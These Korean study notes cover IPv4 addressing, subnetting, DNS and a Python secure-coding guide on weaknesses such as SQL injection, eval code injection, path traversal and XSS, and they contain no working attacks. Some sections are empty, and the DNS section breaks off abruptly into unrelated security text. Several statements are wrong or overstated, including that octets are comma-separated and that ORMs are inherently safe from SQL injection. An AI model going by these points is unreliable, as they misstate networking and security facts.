• 인터넷 공간에서 각 호스트의 고유한 식별자를 의미
• 컴퓨터 네트워크에서 장치들이 서로를 인식하고 통신을 하기 위해서 사용하는 특수한 번호(주소)
• IPv4 주소를 표기할 때는 8비트 단위의 옥텟(octet)으로 나눠서 각 옥텟은 콤마로 구분해서 표기
• 10진수로 표기
  • 1옥텟은 0~255 나타낼 수 있음

(1) 주소 구분

• 네트워크 주소
  • 호스트를 모은 네트워크를 지칭하는 주소
  • 네트워크 주소가 동일한 네트워크를 로컬 네트워크라고 함
• 호스트 주소
  • 하나의 네트워크 내에 존재하는 호스트를 구분하기 위한 주소

(2) IP 주소의 클래스 

(3) 특수 목적 예약

특수 목적으로 예약된 공인 IPv4

특수 목적으로 예약된 것은 공인 IP 주소로 할당받는 것이 불가능하다.

IPv4 주소는 전화번호와 같이 국내에서 표준을 정하여 이용자에게 무한히 할당할 수 있는 자원이 아니라 전 세계적으로 관리되는 유한한 (약 43억 개) 자원이다. 일부는 특수한 목적으로 예약되었으며, 주소 규정에 의하여 사용이 제한적이기 때문에 IP주소 할당 정책에 따라 부여하여 사용해야 한다.

2) 서브넷 마스크(Subnet Mask)

IP 주소를 네트워크 ID와 호스트 ID로 구분하는 방법
서브넷 마스크값을 조정해서 네트워크 영역을 조절

IP가 192.168.0.143이고, 서브넷 마스크가 255.255.255.0가 있다고 가정한다. 서브넷 마스크는 and 연산을 하면 내가 사용할 네트워크 ID를 볼 수 있다.

• 네트워크 ID
  • 많은 LAN 영역에서 자기 LAN 영역을 구분하기 위한 식별자
• 호스트 ID
  • 해당 LAN 영역에 속한 호스트 각각을 구분하기 위한 식별자

3) CIDR(Classless Inter-Domain Routing)

클래스의 제한을 두지 않고 필요한 호스의 수에 따라 적당한 크기의 IP 주소를 할당하는 방법
다양한 길이의 전치부를 이용한 할당 방법

4) 게이트웨이(gateway)

각기 다른 네트워크 ID를 사용하는 LAN 영역 사이를 연결해 주는 기능
라우터라고 부름

L3 (네트워크) 계층의 장비다. 게이트웨이는 소프트웨어적인 측면을 강조하고, 라우터는 하드웨어 측면을 강조해 말하는 것이다.

5) 라우팅 vs 스위칭

• 라우팅
  • 다른 네트워크 ID를 사용하는 LAN 영역 사이트를 연결해 주는 기능
  • 인터넷상의 트래픽 단위인 패킷을 효율적이고 효과적으로 최단 거리 또는 최단 시간에 전달할 수 있도록 하는 것
  • 출발지부터 최종 목적지까지 논리적으로 주소가 부여된 패킷의 전달 과정
• 스위칭
  • LAN 영역에서 MAC 주소에 기반해 내부 통신을 수행하는 과정

2. OSI 7 layer

송신 호스트에서 전송할 데이터가 만들어지면 상위 계층부터 하위 계층으로 내려오면서 계층별로 필요한 정보를 붙인다. 수신에서는 각 계층에서 필요한 것을 가져다 쓴다. 송신 호스팅에서 내려오는 것을 인코딩, 수신 호스트로 올라가는 것을 디코딩이라고 부른다.

1) 계층별 네트워크 장비

• L1 (물리) 계층
  • Repeater, Hub
• L2 (데이터 링크) 계층
  • Switch
  • Bridge
• L3 (네트워크) 계층
  • Router
  • L3 Switch

3. LAN

동일한 네트워크 ID를 공유하는 장치들의 집합
동일한 게이트웨이 주소를 사용하는 장치들의 집합

4. ipconfig/all

모든 설정 정보 

이전에 했던 ipconfig는 기본 설정 정보를 보여주고, ipconfig/all은 모든 설정 정보를 보여준다.

5. DNS(Domain Name Server) 서버

도메인 이름과 IP 주소의 대응 관계를 데이터베이스 형태로 저장하고 제공하는 서비스

호스트의 도메인 이름을 호스트의 네트워크 주소로 바꾸거나 그 반대의 변환을 수행할 수 있도록 하기 위해 개발했다.

1) 도메인 주소 장점

• 하나의 IP 주소를 이용해 여러 개의 웹 서비스 운영이 가능
• 서비스 중인 IP 주소가 바뀌더라도 도메인 주소를 그대로 유지해 접속 방법 변경 없이 서비스를 유지할 수 있음 
• 지리적으로 여러 위치에서 서비스 가능

2) 구조

• 역트리 구조로 최상위 루트부터 top-level 도메인, second-level 도메인, third-level 도메인과 같이 하위 레벨로 원하는 주소를 단계적으로 검색 
• 각 계층의 경계는 "."으로 표시하고 뒤에서 앞으로 해석
• thrid.second.top. 과 같은 형태로 표현하고 맨 뒤의 루트(.)는 생략

3) DNS 명명 규칙

• 도메인 계층은 최대 128계층까지 구성 가능
• 계층별 길이는 최대 63byte까지 사용 가능
• 도메인 계층 구분자(".")를 포함해 전체 도메인 네임의 길이는 최대 255byte까지 사용 가능
• 문자는 알파벳, 숫자, "-"만 사용 가능
• 대소문자 구분하지 않음

4) 루트 도메인

• 도메인을 구성하는 최상위 영역
• DNS 서버는 사용자가 쿼리한 도메인에 값을 직접 갖고 있거나 캐시에 저장된 정보를 이용해 응답
• DNS 서버에 해당 도메인의 정보가 없으면 루트 도메인을 관리하는 루트 DNS에 쿼리
• 루트 DNS는 전 세계에 13개
• DNS 서버를 설치하면 루트 DNS의 IP 주소를 기록한 힌트 파일을 가지고 있어 루트 DNS 관련 정보를 별도로 설정할 필요가 없음 
• 루트 도메인

5) TLD(Top-Level Domain)

IANA(Internet Assigned Numbers Authority)에서 6가지 유형으로 구분

• generic(gTLD)
  • 특별한 제한 없이 일반적으로 사용되는 최상위 도메인으로 세 글자 이상으로 구성
  • 필요에 의해 새로운 gTLD가 지속적으로 만들어지고 있음
• country-code (ccTLD)
  • 국가 최상위 도메인으로 ISO 3166 표준에 의해 규정된 두 글자의 국자 코드를 사용
  • ccTLD를 사용하는 경우 Second Level TLD에는 gTDL에서 구분한 것처럼 사이트 용도에 따른 코드 사용
  • 우리나라는 gTLD를 두 글자로 줄여서 사용
  • 호주나 대만 등은 gTDL을 그대로 사용하는 나라도 있음(com.au, gov.au)
• sponsore(sTLD)
  • 특정 목적을 위한 스폰서를 두고 있는 최상위 도메인
  • 스폰서는 특정 민족공동체, 전문가 집단, 지리적 위치 등이 속할 수 있음
• infrastructure
  • 운용상 중요한 인프라 식별자 공간을 지원하기 위해 전용으로 사용되는 최상위 도메인
  • .arrpa 인터넷 안정성을 유지하기 위해 새로운 모든 인프라 하위 도메인이 배치될 도메인 공간 역할
• generic-restricter (grTLD)
  • 특정 기준을 충족하는 사람이나 단체가 사용할 수 있는 최상위 도메인
  • ..biz, .namee, .pro
• test(tTLD)
  • IDN(Internationalized Domain Name) 개발 프로세스에서 테스트 목적으로 사용하는 최상위 도메인 
  • .test

6) DNS 캐시

7) DNS 동장 방식

재귀적 쿼리 + 반복적 쿼리

• 재귀적 쿼리는 쿼리를 보낸 클라이언트에 서버가 최종 결괏값을 반환하는 서버 중심 쿼리
• 반복적 쿼리는 최종값을 받을 때까지 클라이언트에서 쿼리를 계속 진행하는 방식
• 재귀적 쿼리는 클라이언트와 로컬 DNS 간에서 사용
• 반복적 쿼리는 로컬 DNS 서버와 상위 DNS 구간에서 사용

8) DNS 영역 파일 주요 레코드

보안과 관련한 기능을 구현하지 않거나 부적절하게 구현한 경우 발생

인증, 인가, 접근통제, 암호화, 권한관리 등을 부적절하게 구현 시 발생하는 보안 약점은 적절한 인증 없는 중요기능 허용, 부적절한 인가 등이 있다.

중요한 정보가 있을 때, 이 중요한 정보를 보호하기 위해서는 인가된 사용자만 접근할 수 있도록 접근 통제를 하고, 식별, 인증, 인가를 해야 한다.

접근 통제에 문제가 생기는 것은 중요 정보에 권한이 없는 사용자에게 중요 정보가 노출된다고 한다. 권한이 없는 사용자가 중요 정보를 획득했을 때 중요 정보를 알지 못하도록 방어하기 위해서 암호화한다. 

1) 적절한 인증 없는 중요 기능 허용

인증된 사용자인지 확인하지 않고 기능을 제공할 때 발생 

Django 에서 기본적인 인증 로그인, 로그아웃 기능을 제공하고, DRF에서는 토큰 및 세션 인증을 제공하고 있다.

(1) 안전한 코딩기법

클라이언트의 보안 검사를 우회하여 서버에 접근하지 못 하도록 설계하고 중요한 정보가 있는 페이지는 재인증을 적용해야 한다. 검증된 라이브러리, 프레임워크를 사용해야 한다.

2) 부적절한 인가

(1) 접근통제 유형

• 화면에서의 접근통제
  • 권한 있는 사용자에게만 기능 버튼, 링크, 메뉴를 제공
• 기능에서의 접근통제
  • 모든 요청을 처리하는 것이 아니고, 권한이 있는 사용자의 요청만 처리
• 데이터에서의 접근통제
  • 접근할 수 있는 데이터에 대해서 처리를 제공

접근통제를 검사하지 않거나 불완전하게 검사하는 경우 공격자는 접근할 수 있는 실행경로를 통해 정보를 유출할 수 있다.

(2) 안전한 코딩기법

프로그램이 제공하는 정보와 기능이 가지는 역할에 맞게 분리 개발함으로써 공격자에게 노출되는 공격 정보를 최소화하고 사용자의 권한에 따른 ACL을 관리한다.

3) 중요한 자원에 대한 잘못된 권한 설정

파일을 생성할 때 과도한 권한을 부여 하면 의도하지 않은 사용자가 해당 자원을 사용하게 된다.

(1) 안전한 코딩기법

중요한 파일(설정 파일, 실행 파일, 라이브러리 등)은 관리자만 읽고 쓰기가 가능하도록 설정하고 중요한 파일 같이 중요한 자원을 사용하는 경우 허가 받지 않은 사용자의 접근을 검증, 제한한다.

4) 취약한 암호화 알고리즘 사용

암호화는 접근통제에 문제가 생겼을 때 그 정보를 보호하기 위한 수단이다. 정보보호 측면에서 취약하거나 위험한 암호화 알고리즘을 사용해서는 안 된다. 오래된 암호화 알고리즘의 경우는 컴퓨터의 성능이 향상됨에 따라 취약해지기도 한다.

(1) 안전한 코딩기법

• 안전한 암호화 알고리즘 사용
  • 보안성이 검증된 알고리즘
  • 보안 강도를 보장하는 알고리즘
  • 인코딩 / 디코딩 방법은 암호화 처리에 사용하면 안 됨
• 안전한 암호화 알고리즘이 보안 강도를 보장할 수 있는 충분한 키 길이 사용
• 암호화에 사용되는 키를 안전하게 생성하고 관리
• 취약한 암호화 알고리즘 사용 금지
  • RC2(ARC2)
  • RC4(ARC4)
  • RC5,
  • RC6
  • MD4
  • MD5
  • SHA1
  • DES

암호화 알고리즘은 이미 검증된 알고리즘을 사용해야 하며 자신만의 암호화 알고리즘을 개발하는 것은 위험하다.

5) 암호화되지 않은 중요정보

중요 정보를 암호화하지 않고 전송하거나 저장할 때 발생

중요 정보가 포함된 데이터를 평문으로 전송 또는 저장 시 인가되지 않은 사용자에게 민감한 정보가 노출될 수 있다.

(1) 안전한 코딩기법

중요 정보를 전송할 때는 반드시 암호화 처리를 하고, 읽거나 쓸 경우에 권한 인증을 통해 인가된 사용자만 중요 정보에 접근하도록 해야 한다. 데이터를 전송할 때 암호화 해서 전송하거나 HTTPS, SSH, SSL과 보안 통신을 이용해서 전송한다.

쿠키에 중요 데이터를 저장하는 경우 쿠키 객체에 보안 속성을 설정해 중요 정보의 노출을 방지할 수 있다.

6) 하드 코드 된 중요 정보

주요 정책이나 코드를 신규로 적용하는 것과 일관되게 변경하기가 어렵다.

코드 내부에 하드 코드 된 패스워드를 포함하고, 이를 이용해 내부 인증에 사용하거나 외부 컴포넌트와 통신을 하는 경우 관리자의 정보가 노출될 수 있다. 하드 코드 된 암호화 키를 사용해 암호화할 때 암호키의 해시를 계산해 저장하더라도 역계산이 가능해 Brute Force 공격에는 취약하다.

 (1) 안전한 코딩기법

패스워드는 암호화 후 별도의 파일에 저장해야 한다. 중요 정보 암호화 시 상수가 아닌 암호화 키를 사용하고, 암호화가 잘 되었더라도 소스코드 내부에 상수 형태의 암호화 키를 주석으로 달거나 저장하면 안 된다.

7) 충분하지 않은 키 길이 사용

암호화에 안정성을 보장할 수 있는 길이의 암호화 키를 사용하지 않아서 발생한다.

(1) 안전한 코딩기법

RSA 알고리즘은 적어도 2,048비트 이상의 길이를 가진 키와 함께 사용해야 하고, 대칭 암호화 알고리즘의 경우에는 적어도 128비트 이상의 키를 사용해야 한다

8) 적절하지 않은 난수 값 사용

예측 불가능한 숫자가 필요한 상황에서 예측할 수 있는 난수를 사용한다면 공격자가 생성되는 다음 숫자를 예상해 시스템을 공격할 수 있다.

(1) 안전한 코딩기법

난수 함수에서 시드를 사용하는 경우에는 고정된 값을 사용하지 않고 예측하기 어려운 방법으로 생성된 값을 사용한다.

난수 함수를 사용할 때는 시드를 설정할 수 없는 난수 함수를 사용하면 안 된다.

9) 취약한 패스워드 허용

패스워드 선택 및 이용 안내서

패스워드를 생성할 때 사용자에게 강한 조합 규칙을 요구하지 않으면 계정이 취약해지기 때문에 패스워드 선택 및 이용 안내서에서 제시하는 패스워드 설정 규칙을 사용한다.

(1) 안전한 코딩기법

패스워드 선택 및 이용 안내서에도 나오듯이 패스워드는 숫자, 영문자, 특수문자 등을 혼합하여 글자 수를 제한해서 사용해야 하고 주기적으로 변경하도록 해야 한다.

10) 부적절한 전자서명 확인

프로그램 코드의 전자서명에 대한 유효성 검증이 적절하지 않아 공격자의 악의적인 코드를 실행할 수 있는 보안 약점으로, 클라이언트와 서버 사이의 주요 데이터 전송, 파일 다운로드 시 발생할 수 있다.

(1) 안전한 코딩기법

주요 데이터 전송 또는 다운로드 시 데이터에 대한 전자서명을 함께 전송하고 수신 측에서는 전달받은 전자 서명을 검증해 파일의 변조 여부를 확인해야 한다.

비대칭 키 알고리즘을 사용한다. 비대칭 키 알고리즘은 암호화에 사용하는 키와 복호화에 사용하는 키가 상이한 알고리즘이다. 개인키로 암호화하면 공개키로 복호화하고, 공개키로 암호화하면 개인키로 복호화할 수 있다.

송신자의 개인키로 암호화해서 전달하면 수신자가 송신자의 공개키를 취득해서 복호화할 수 있다. 송신자의 공개키는 누구나가 취득할 수 있으므로 복호화가 가능하다. 송신자의 공개키로 복호화한다는 것은 송신자만 가지고 있는 개인키로 암호화했다는 것을 반증하고 송신자가 만든 것이 맞다는 것을 증명하는데 이를 부인방지, 원본증명, 인증했다고 할 수 있다.

송신자의 개인 키로 암호화하는 것을 전자서명이라고 하고, 송신자의 공개키로 복호화하는 것을 서명 검증한다고 한다.

송신자가 수신자의 공개키를 취득해서 암호화해서 전달하면 수신자는 자신의 개인키로 복호화할 수 있다. 이때는 암호화된 데이터는 누구나 받을 수 있지만, 복호화는 할 수 없게 된다. 이를 기밀성이 보장된다고 한다.

11) 부적절한 인증서 유효성 검증

인증서가 유효하지 않거나 악성인 경우 공격자가 호스트와 클라이언트 사이의 통신 구간을 가로채 신뢰하는 엔티티인 것처럼 속일 수 있다.

신뢰하는 호스트로부터 전달받은 것처럼 보이는 스푸핑 된 데이터 또는 변조된 데이터를 아무런 의심 없이 수신하는 상황이 발생할 수 있다.

(1) 유효성 검사

• 날짜
• 폐기 여부
• 신뢰할 수 있는 기간

(2) 안전한 코딩기법

인증서를 사용하는 경우 송신 측에서 전달한 인증서가 유효한지 검증한 후 데이터를 송수신해야 한다.

12) 사용자 하드디스크에 저장되는 쿠키를 통한 정보 노출

쿠키의 유효 기간 또는 지속 시간을 필요 이상으로 길게 잡는 경우

쿠키는 메모리에 상주하며, 브라우저가 종료되면 사라진다. 개발자가 원하는 경우, 브라우저 세션과 관계없이 지속해서 쿠키값을 저장하도록 설정할 수 있다. 이렇게 영속적인 쿠키에 저장하면 공격자는 쿠키에 접근할 기회를 많이 가지게 되고 시스템을 취약하게 만든다.

(1) 안전한 코딩기법

• 중요 정보를 쿠키에 저장하지 않음
• 중요 정보를 포함하는 경우 반드시 암호화해서 저장
• 유효 기간, 지속 시간을 필요한 만큼만 최소로 설정
• 보안 속성을 설정
  • HTTPS 통신을 할 때만 쿠키를 서버로 전달하도록 제한
• HttpOnly 속성 설정
  • JavaScript 등을 이용해서 쿠키에 접근하는 것을 방지

13) 주석문 안에 포함된 시스템 주요 정보

개발자가 편의를 위해서 주석문에 패스워드를 적어둔 경우

소프트웨어가 완성된 후에는 그것을 제거하는 것이 매우 어렵게 된다. 만약 공격자가 소스코드에 접근할 수 있다면 시스템에 손쉽게 침입할 수 있다.

(1) 안전한 코딩기법

주석에는 아이디, 패스워드 등 보안과 관련된 내용을 기입하지 않는다.

14) 솔트 없이 일방향 해시 함수 사용

중요 정보를 솔트 없이 일방향 해시함수를 사용해 저장한다면 공격자는 미리 계산된 레인보우 테이블을 이용해 해시값을 알아낼 수 있다.

(1) 안전한 코딩기법

• 안전한 해시 함수 사용
• 솔트를 적용
• 솔트는 안전하게 적용
• 솔트값은 사용자별로 유일하게 생성
• 사용자별 솔트 값을 별도로 저장

15) 무결성 검사 없는 코드 다운로드

외부에서 가져온 코드를 검증, 제한하지 않고 사용

외부에서 가져온 소스코드 또는 실행 파일을 검증, 제한 억이 다운로드 후 실행하는 프로그램이 있다. 이런 프로그램은 호스트 서버의 변조, DNS 스푸핑, 전송 시의 코드 변조 등의 방법을 이용해 악의적인 코드를 실행할 수 있다.

패일 무결성을 확인하는 두 가지 주요 방법은 암호화 해시 및 디지털 서명이 있다.

(1) 안전한 코딩기법

DNS 스푸핑을 방어할 수 있는 DNS lookup을 수행하고 코드 전송 시 신뢰할 수 있는 암호화 알고리즘으로 암호화한다.

파일의 인증서 또는 해시값을 검사해 변조되지 않은 파일인지 확인한다.

16) 반복된 인증 시도 제한 기능 부재

일정 시간 내에 여러 번의 인증 시도 시 계정 잠금 또는 추가 인증 방법 등의 조치가 있어야 한다. 그렇지 않으면 공격자는 Brute Force 공격으로 로그인 성공 및 권한 획득을 할 수 있다.

(1) 안전한 코딩기법

최대 인증 시도 횟수를 제한하고, 횟수를 초과할 경수 계정을 잠금 하거나 추가적인 인증 과정을 거치도록 한다.

CAPTCHA는 Two Factor 인증 방법도 있다.

2. 시간 및 상태

동시 또는 거의 동시에 여러 코드 수행을 지원하는 병렬 시스템이나 하나 이상의 프로세스가 동작하는 환경에서 시간 및 상태를 부적절하게 관리하여 발생할 수 있는 보안 약점이다.

1) 경쟁 조건(Race condition): 검사 시점과 사용 시점

한정된 자원을 동시에 이용하려는 여러 프로세스가 자원의 이용을 위해 경쟁을 벌이는 현상

자원을 사용하기 전에 자원의 상태를 검사하지만, 자원을 사용하는 시점과 검사하는 시점이 다르기 때문에 검사하는 시점에 존재하던 자원이 사용하던 시점에 사라지는 등 자원의 상태가 변하는 경우 발생한다.

하나의 자원에 대해 동시에 검사 시점과 사용 시점이 달라 생기는 보안 약점으로 인해 동기화 오류뿐만 아니라 교착상태 등과 같은 문제점이 발생할 수 있다.

(1) 안전한 코딩기법

변수, 파일과 같은 공유자원을 여러 프로세스가 접근하여 사용할 경우 동기화 구문을 사용하여 한 번에 하나의 프로세스만 접근할 수 있게 해야 한다.

2) 종료되지 않는 반복문 또는 재귀 함수

재귀 함수 구현 시 재귀문을 빠져나가는 조건을 구현하지 않으면 무한 재귀에 빠지게 되어 오류 발생

재귀 함수의 순환 횟수를 제어하지 못해 할당된 메모리나 스택 등의 자원이 의도한 범위를 과도하게 초과할 수 있다.

파이썬에서는 재귀 함수의 재귀 반복 제한이 적용되어 있어 무한루프가 발생하지 않는다.

(1) 안전한 코딩기법

재귀 함수 호출 시 횟수를 제한하거나 재귀 함수 종료 조건을 명확히 정의해야 한다.

3. 예외 처리

예외를 처리하지 않거나 불충분하게 처리하여 에러 정보에 중요정보가 포함될 때 발생할 수 있는 보안 약점

1) 오류 메시지 정보 노출

오류 메시지를 통한 시스템 정보의 과도한 노출

민감한 정보를 포함하는 오류 메시지를 생성해 외부에 제공하는 경우 공격자는 프로그램 내부 구조를 쉽게 파악할 수 있어 악성 행위로 이어질 수 있다.

(1) 안전한 코딩기법

오류 메시지는 사용자에게 추상적인 내용 또는 최소한의 유용한 정보만 포함해야 한다. 민감한 정보를 포함하지 않고 미리 정의된 메시지를 제공해야 한다. 

2) 오류 상황 대응 부재

오류에 대해 예외 처리를 하지 않을 경우 발생

오류에 대해 예외 처리를 하지 않을 경우 공격자는 오류 상황을 악용해 개발자가 의도하지 않은 방향으로 동작하도록 할 수 있다.

(1) 안전한 코딩기법

예외 처리는 코드를 견고하게 만들고 오류가 발생할 수 있는 부분에 대하여 제어문을 사용해 적절하게 예외 처리한다.

3) 부적절한 예외 처리

함수의 결괏값에 대한 적절한 처리 또는 예외 상황에 대한 조건을 적절하게 검사하지 않을 경우 발생한다.

(1) 안전한 코딩기법

값을 반환하는 모든 함수의 결괏값을 검사해야 한다. 결괏값이 개발자가 의도했던 값인지 검사하고 예외 처리를 사용하는 경우에 광범위한 예외 처리 대신 구체적인 예외 처리를 수행한다.

4. 코드 오류

타입 변환 오류, 자원의 부적절한 반환 등과 같이 개발자가 범할 수 있는 코딩 오류로 인해 유발되는 보안 약점

1) Null Pointer 역참조

공격자가 의도적으로 널 포인터 역참조를 발생시키는 경우 공격자는 그 결과로 발생하는 예와 상황을 이용해 추후 공격 계획에 활용할 수 있다.

파이썬에서는 Null 객체가 사용되지 않으며 대신 None 키워드를 사용해 null 개체와 변수를 정의한다.

(1) 안전한 코딩기법

None을 반환하는 함수를 사용하면 조건문에서 False로 평가될 수 있기 때문에 실수하기 쉽다. None이 될 수 있는 데이터를 참조하기 전에 해당 데이터의 값이 None인지 검사하여 시스템 오류를 줄일 수 있다.

2) 부적절한 자원 해제

자원을 사용하고 해제하지 않거나 잘못된 방법으로 해제할 때 발생한다. 

(1) 안전한 코딩기법

자원을 획득하여 사용한 다음에는 반드시 자원을 해제 후 반환한다.

3) 신뢰할 수 없는 데이터의 역직렬화

역직렬화는 반대 연산으로 바이너리 파일이나 바이트 스트림으로부터 객체 구조로 복원하는 과정이다. 바이너리 파일로 사람은 읽을 수가 없는데 역직렬화를 통해 읽을 수 있는 언어로 바꿀 수 있다.

파이썬에서는 pickle 모듈을 통해 직렬화, 역직렬화를 수행할 수 있다. pickle 모듈은 데이터 변조에 대한 검증 과정이 없기 때문에 임의 코드를 실행하는 악의적인 pickle 데이터를 구성할 수 있어 pickle을 사용해 역직렬화하는 경우 hmac으로 데이터에 서명하거나 json 모듈을 사용하는 것을 고려해야 한다.

(1) 안전한 코딩기법

모든 변수를 사용 전에 반드시 올바른 초깃값을 할당해야 한다. 신뢰할 수 없는 데이터를 역직렬화 하지 않도록 구성해야 한다. 

5. 캡슐화

중요한 데이터 또는 기능성을 불충분하게 캡슐화하거나 잘못 사용함으로써 발생하는 보안 약점으로 정보 노출, 권한 문제 등이 발생

1) 잘못된 세션에 의한 데이터 정보 노출

다중 스레드 환경에서는 싱글톤(Singleton) 객체 필드에 경쟁 조건(Race Condition)이 발생할 수 있다. 

(1) 안전한 코딩기법

다중 스레드 환경에서는 정보를 저장하는 전역 변수가 포함되지 않도록 코드를 작성해 서로 다른 세션에서 데이터를 공유하지 않도록 해야 한다.

다중 스레드 환경에서 클래스 변수의 값은 하위 메소드와 공유되므로 필요한 경우 인스턴스 변수로 선언하여 사용한다.

2) 제거되지 않고 남은 디버그 코드

디버그 코드는 성정 등의 민감한 정보 또는 의도하지 않은 시스템 제어로 이어질 수 있는 정보를 담고 있을 수 있다.

만일 디버그 코드가 남겨진 채로 배포될 경우 공격자가 식별 과정을 우회하거나 의도하지 않은 정보 노출로 이어질 수 있다.

(1) 안전한 코딩기법

배포 전 반드시 디버그 코드 확인 및 삭제와 디버그 모드를 비화성화한다.

3) Public 메소드로부터 반환된 Private 배열

파이썬은 명시적인 private 선언이 없다. 이름 앞에 밑줄로 시작하면 private로 처리된다. public으로 선언된 메소드에서 배열을 반환하면 해당 배열의 참조 객체가 외부에 공개되어 외부에서 배열 수정과 객체 속성 변경이 가능해진다.

(1) 안전한 코딩기법

private로 선언된 배열을 public으로 선언된 메소드로 반환하지 않도록 한다. 

4) Private 배열에 Public 데이터 할당

public으로 선언된 메소드의 인자가 private로 선언된 배열에 저장되면 private 배열을 외부에서 접근하여 
배열 수정과 객체 속성 변경이 가능해진다.

(1) 안전한 코딩기법

public으로 선언된 메소드의 인자를 private로 선언된 배열에 저장하지 않도록 한다. 사용자가 전달한 값으로 
클래스 외부에서 private 값을 변경해서는 안 되며, 필요한 경우 별도의 인스턴스 변수로 정의하거나 의도한 
기능이라면 전달된 값의 정상여부를 검증한 후 적용해야 한다.

6. API 오용

의도된 사용에 반하는 방법으로 API를 사용하거나 보안에 취약한 API를 사용하여 발생할 수 있는 보안 약점

1) DNS lookup에 의존한 보안 결정

로컬 DNS 서버의 캐시가 공격자에 의해 오염된 상황이라면 사용자와 특정 서버 간의 네트워크 트래픽이 공격자를 경유하도록 할 수도 있다. 또한 공격자가 마치 동일 도메인에 속한 서버인 것처럼 위장할 수도 있다.

(1) 안전한 코딩기법

도메인명을 이용한 DNS lookup을 하지 않도록 한다. 도메인명에 의존에서 보안 결정(인증 및 접근 통제 등)을 하지 않아야 한다. 

2) 취약한 API 사용

취약한 API는 보안상 금지된 함수이거나 부주의하게 사용될 가능성이 많은 API를 의미한다.

외부 패키지 사용 시 보안 문제가 발생하게 되는 원인을 크게 두 가지로 분류할 수 있다.

• 사용자 배포 패키지 내의 결함으로 인한 취약점
• 언어 엔진 자체의 결함으로 인한 취약점 

(1) 안전한 API 선택

취약한 API를 코드에 사용하지 않는 것이 제일 좋다. 하지만 이는 파이썬 생태계에서는 적용이 어려운 방법이다. 안전하다고 알려진 API라고 하더라도 취약점이 발견되지 않을 것이라는 보장이 없다.

최초 패키지 사용 시 가장 현실적인 방법

• 사용 통계
  • 얼마나 많은 사람들이 해당 패키지를 다운로드 샜고, 선호하고 있는지
• 이슈 관리
  • 지속해서 발견되는 버그 또는 이슈를 어떻게 처리하고 있는지
• 마지막 버전
  • 코드 유지관리가 잘 되고 있는지
• 발견된 취약점
  • 특정 버전에서 취약점이 발견되었는지
  • 결함이 제거된 버전이 공개되어 있는지

Python 시큐어코딩 가이드

프로그램 입력값에 대한 검증 누락 또는 부적절한 검증, 데이터의 잘못된 형식 지정, 일관되지 않은 언어셋 사용 등으로 인해 발생하는 보안 약점으로 SQL 삽입, XSS 등의 공격을 유발할 수 있다.

1) SQL 삽입

입력값에 쿼리 조작 문자열을 확인하지 않고 쿼리문 생성 및 실행에 사용하는 경우 발생

쿼리가 조작되어 실행되기 때문에 권한 밖의 데이터에 접근할 수 있고, 쿼리 실행을 통해서 제공되는 기능을 우회해서 사용해 해당하는 시스템의 제어권을 탈취할 수 있다.

(1) 안전한 코딩 기법

DB API 사용 시 인자(arguments)를 통해 외부 입력값을 바인딩해서 사용하면 SQL 삽입 공격으로부터 안전하게 보호할 수 있다.

구조를 정의하고 정의된 값을 전달해서 실행하는데, 이때 값을 구조에 의해 반영하는 것은 해당하는 애플리케이션에서 담당해야 한다.

파이썬에서 많이 사용되는 ORM 프레임워크는 쿼리를 직접 만들지 않고, 프레임워크가 알아서 만들어 주기 때문에 SQL 삽입 공격으로부터 안전하다.

쿼리를 만들 때 문자열 결합 형식으로 만들면 안 되고, 입력값에 대한 검증이 있어야 한다.

이를 안전하게 만들기 위해서는 쿼리의 구조를 정의하고 쿼리 실행에 필요한 값을 execute 메서드에 매개변수로 사용해야 한다.

2) 코드 삽입

공격자가 소프트웨어의 의도된 동작을 변경하도록 임의 코드를 삽입해 소프트웨어가 비정상적으로 동작하도록 하는 보안 약점

코드 삽입은 해당하는 코드를 해석해서 실행하는 주는 코드를 말한다. 소스 코드의 코드를 해석해서 실행 해주는 ecal(), exec() 등이 있다.

print(eval('1 + 1'))

위 코드가 있을 때, '1 + 1'은 단순한 문자열이 아니고, python 코드로 실행한다. '1+1'을 해석해서 2라는 값을 출력하게 된다. '1+1'에 파이썬 코드(외부에서 들어오는 값)가 들어가면 해당하는 서버에서 파이썬 코드가 실행되어 결과가 노출되게 된다.

(1) 안전한 코딩기법

동적 코드를 실행할 수 있는 함수를 사용하지 않는 것이 제일 좋은 방법이다. 필요시, 실행할 수 있는 동적 코드를 입력값으로 받지 않도록 외부 입력값에 대해 제한, 화이트리스트 기반 검증을 수행해야 한다. 

3) 경로 조작 및 자원 삽입

외부 입력값이 자원 식별자로 사용되는 경우

외부 입력값을 검증, 제한하지 않고 사용하면, 권한 밖 자원에 대해 접근할 수 있고 자원을 선점하거나 충돌시켜 정상적인 서비스를 방해한다.

(1) 안전한 코딩기법

외부로부터 받은 입력값을 자원의 식별자로 사용하는 경우 적절한 검증을 거치도록 하거나 사전에 정의된 리스트에 포함된 식별자만 사용하도록 제한해야 한다. 특히 외부 입력이 파일명인 경우 필터를 적용해 경로 조작 문자열(/, \, .. 등)을 제거해야 한다.

외부 입력값에서 경로 조작 문자열을 제거하기 위해서는 replace, re.sub, filter 함수를 사용해 특수문자 필터링할 수 있다.

4) 크로스사이트 스크립트(XSS)

의도하지 않은 스크립트 코드 실행

크로스사이트 스크립트 공격은 웹사이트에 악성 코드를 삽입하는 공격 방법이다. XSS 공격은 일반적으로 애플리케이션 호스트 자체보다 사용자를 목표로 삼는다.

(1) 유형

1. Reflective XSS (Non-persistent XSS)
   • 입력값이 다음 화면 출력에 사용하는 경우
   • 입력값에 스크립트 코드 포함 여부를 확인하지 않고 그대로 출력에 사용하면 입력값으로 전달된 스크립트 코드가 사용자 브라우저에서 실행
2. Stored XSS (Persistent XSS)
   • 공격자가 입력한 스크립트 코드가 취약한 서버에 저장
   • 사용자가 조회 시 저장된 스크립트 코드가 그대로 사용자 브라우저로 전달되어 실행
3. DOM XSS (Client-Side XSS)
   • 개발자가 작성한 스크립트 코드의 취약점을 이용

(2) 안전한 코딩기법

외부 입력값 또는 출력값에 스크립트가 삽입되지 못하도록 문자열 치환 함수를 사용하여 치환하거나, html 라이브러리의 escape()를 사용해 문자열을 변환해야 한다. HTML 태그를 허용해야 하는 게시판에서는 허용할 HTML 태그들을 화이트 리스트로 만들어 해당 태그만 지원한다.

파이썬 프레임워크인 Django, Flask 등을 사용하는 경우 악의적인 스크립트가 삽입되지 못하도록 프레임워크 자체에서 공격에 사용될 수 있는 문자를 HTML 특수문자로 치환하여 페이지를 생성하므로 XSS 공격으로부터 안전하다.

